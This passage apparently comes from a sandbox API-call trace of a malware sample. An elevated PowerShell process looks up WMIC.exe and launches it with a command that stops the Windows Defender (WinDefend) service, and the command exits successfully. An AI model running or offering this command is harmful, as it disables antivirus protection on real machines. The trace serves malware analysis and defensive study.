lpFilePart=0x0) returned 0x18 [0250.269] SetErrorMode (uMode=0x1) returned 0x1 [0250.269] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.270] SetErrorMode (uMode=0x1) returned 0x1 [0250.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0250.270] SetErrorMode (uMode=0x1) returned 0x1 [0250.270] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.271] SetErrorMode (uMode=0x1) returned 0x1 [0250.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0250.271] SetErrorMode (uMode=0x1) returned 0x1 [0250.271] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.271] SetErrorMode (uMode=0x1) returned 0x1 [0250.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0250.272] SetErrorMode (uMode=0x1) returned 0x1 [0250.272] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.272] SetErrorMode (uMode=0x1) returned 0x1 [0250.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0250.273] SetErrorMode (uMode=0x1) returned 0x1 [0250.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0250.273] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c90d970 | out: lpFindFileData=0x1c90d970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0250.273] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0250.273] SetErrorMode (uMode=0x1) returned 0x1 [0250.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c90da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0250.274] SetErrorMode (uMode=0x1) returned 0x1 [0250.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c90dc90 | out: lpFileInformation=0x1c90dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0250.274] SetErrorMode (uMode=0x1) returned 0x1 [0250.275] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0250.275] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c90de78, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c90de78) returned 0x4550 [0250.276] CoTaskMemFree (pv=0x1b9b1010) [0250.276] GetConsoleWindow () returned 0x5011e [0250.276] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0250.277] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0250.277] CoTaskMemFree (pv=0x2af7b0) [0250.277] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0250.277] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0250.277] CoTaskMemFree (pv=0x2af7b0) [0250.277] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice", pNumArgs=0x1c90dec0 | out: pNumArgs=0x1c90dec0) returned 0x28a430*="" [0250.277] lstrlenW (lpString="path") returned 4 [0250.277] CoTaskMemAlloc (cb=0xc) returned 0x22c180 [0250.277] RtlMoveMemory (in: Destination=0x22c180, Source=0x28a472, Length=0xa | out: Destination=0x22c180) [0250.277] CoTaskMemFree (pv=0x22c180) [0250.277] lstrlenW (lpString="Win32_Service") returned 13 [0250.277] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0250.277] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a47c, Length=0x1c | out: Destination=0x1b9b1010) [0250.277] CoTaskMemFree (pv=0x1b9b1010) [0250.277] lstrlenW (lpString="where") returned 5 [0250.277] CoTaskMemAlloc (cb=0xe) returned 0x22c180 [0250.278] RtlMoveMemory (in: Destination=0x22c180, Source=0x28a498, Length=0xc | out: Destination=0x22c180) [0250.278] CoTaskMemFree (pv=0x22c180) [0250.278] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0250.278] CoTaskMemAlloc (cb=0x36) returned 0x1b9c7170 [0250.278] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x28a4a4, Length=0x34 | out: Destination=0x1b9c7170) [0250.278] CoTaskMemFree (pv=0x1b9c7170) [0250.278] lstrlenW (lpString="call") returned 4 [0250.278] CoTaskMemAlloc (cb=0xc) returned 0x22c180 [0250.278] RtlMoveMemory (in: Destination=0x22c180, Source=0x28a4d8, Length=0xa | out: Destination=0x22c180) [0250.278] CoTaskMemFree (pv=0x22c180) [0250.278] lstrlenW (lpString="stopservice") returned 11 [0250.278] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0250.278] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a4e2, Length=0x18 | out: Destination=0x1b9b1010) [0250.278] CoTaskMemFree (pv=0x1b9b1010) [0250.278] LocalFree (hMem=0x28a430) returned 0x0 [0250.279] CoTaskMemAlloc (cb=0x804) returned 0x1b9df7f0 [0250.279] GetConsoleTitleW (in: lpConsoleTitle=0x1b9df7f0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0250.280] CoTaskMemFree (pv=0x1b9df7f0) [0250.280] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0250.280] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c90de20*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31f3090 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice", lpProcessInformation=0x31f3090*(hProcess=0x714, hThread=0x710, dwProcessId=0xd8, dwThreadId=0xdc)) returned 1 [0250.284] CoTaskMemFree (pv=0x253f20) [0250.284] CloseHandle (hObject=0x710) returned 1 [0250.284] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0250.284] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c90dec8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c90dec8) returned 0x4550 [0250.285] CoTaskMemFree (pv=0x1b9b1010) [0250.285] GetCurrentProcess () returned 0xffffffffffffffff [0250.285] GetCurrentProcess () returned 0xffffffffffffffff [0250.285] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x714, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c90dfa8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c90dfa8*=0x710) returned 1 [0251.325] CloseHandle (hObject=0x710) returned 1 [0251.326] GetExitCodeProcess (in: hProcess=0x714, lpExitCode=0x1c90e018 | out: lpExitCode=0x1c90e018*=0x0) returned 1 [0251.326] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0251.328] CloseHandle (hObject=0x714) returned 1 [0251.328] SetEvent (hEvent=0x6e0) returned 1 [0251.329] SetEvent (hEvent=0x6d4) returned 1 [0251.329] SetEvent (hEvent=0x6d8) returned 1 [0251.329] SetEvent (hEvent=0x6dc) returned 1 [0251.329] SetEvent (hEvent=0x6f0) returned 1 [0251.329] SetEvent (hEvent=0x6e4) returned 1 [0251.329] SetEvent (hEvent=0x6e8) returned 1 [0251.330] SetEvent (hEvent=0x6ec) returned 1 [0251.330] SetEvent (hEvent=0x6f4) returned 1 [0251.330] CoUninitialize () Thread: id = 201 os_tid = 0xb10 [0251.372] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0251.375] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0251.376] VirtualQuery (in: lpAddress=0x1c9cd3a0, lpBuffer=0x1c9ce260, dwLength=0x30 | out: lpBuffer=0x1c9ce260*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.378] VirtualQuery (in: lpAddress=0x1c9cd650, lpBuffer=0x1c9ce510, dwLength=0x30 | out: lpBuffer=0x1c9ce510*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.382] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0251.382] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0251.382] CoTaskMemFree (pv=0x2af8c0) [0251.382] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0251.382] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0251.382] CoTaskMemFree (pv=0x2af8c0) [0251.383] CoTaskMemAlloc (cb=0x20e) returned 0x2bcd30 [0251.383] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bcd30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0251.383] CoTaskMemFree (pv=0x2bcd30) [0251.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.384] SetErrorMode (uMode=0x1) returned 0x1 [0251.384] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.384] SetErrorMode (uMode=0x1) returned 0x1 [0251.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.385] SetErrorMode (uMode=0x1) returned 0x1 [0251.385] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.385] SetErrorMode (uMode=0x1) returned 0x1 [0251.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.386] SetErrorMode (uMode=0x1) returned 0x1 [0251.386] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.386] SetErrorMode (uMode=0x1) returned 0x1 [0251.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.387] SetErrorMode (uMode=0x1) returned 0x1 [0251.387] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.387] SetErrorMode (uMode=0x1) returned 0x1 [0251.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.388] SetErrorMode (uMode=0x1) returned 0x1 [0251.388] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.388] SetErrorMode (uMode=0x1) returned 0x1 [0251.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.389] SetErrorMode (uMode=0x1) returned 0x1 [0251.389] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.389] SetErrorMode (uMode=0x1) returned 0x1 [0251.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.389] SetErrorMode (uMode=0x1) returned 0x1 [0251.390] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.390] SetErrorMode (uMode=0x1) returned 0x1 [0251.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.390] SetErrorMode (uMode=0x1) returned 0x1 [0251.391] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.391] SetErrorMode (uMode=0x1) returned 0x1 [0251.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.391] SetErrorMode (uMode=0x1) returned 0x1 [0251.392] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.392] SetErrorMode (uMode=0x1) returned 0x1 [0251.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.392] SetErrorMode (uMode=0x1) returned 0x1 [0251.393] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.393] SetErrorMode (uMode=0x1) returned 0x1 [0251.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.393] SetErrorMode (uMode=0x1) returned 0x1 [0251.393] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.394] SetErrorMode (uMode=0x1) returned 0x1 [0251.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.394] SetErrorMode (uMode=0x1) returned 0x1 [0251.394] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.395] SetErrorMode (uMode=0x1) returned 0x1 [0251.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.395] SetErrorMode (uMode=0x1) returned 0x1 [0251.395] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.396] SetErrorMode (uMode=0x1) returned 0x1 [0251.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.396] SetErrorMode (uMode=0x1) returned 0x1 [0251.396] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.396] SetErrorMode (uMode=0x1) returned 0x1 [0251.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0251.397] SetErrorMode (uMode=0x1) returned 0x1 [0251.397] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.397] SetErrorMode (uMode=0x1) returned 0x1 [0251.397] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.398] SetErrorMode (uMode=0x1) returned 0x1 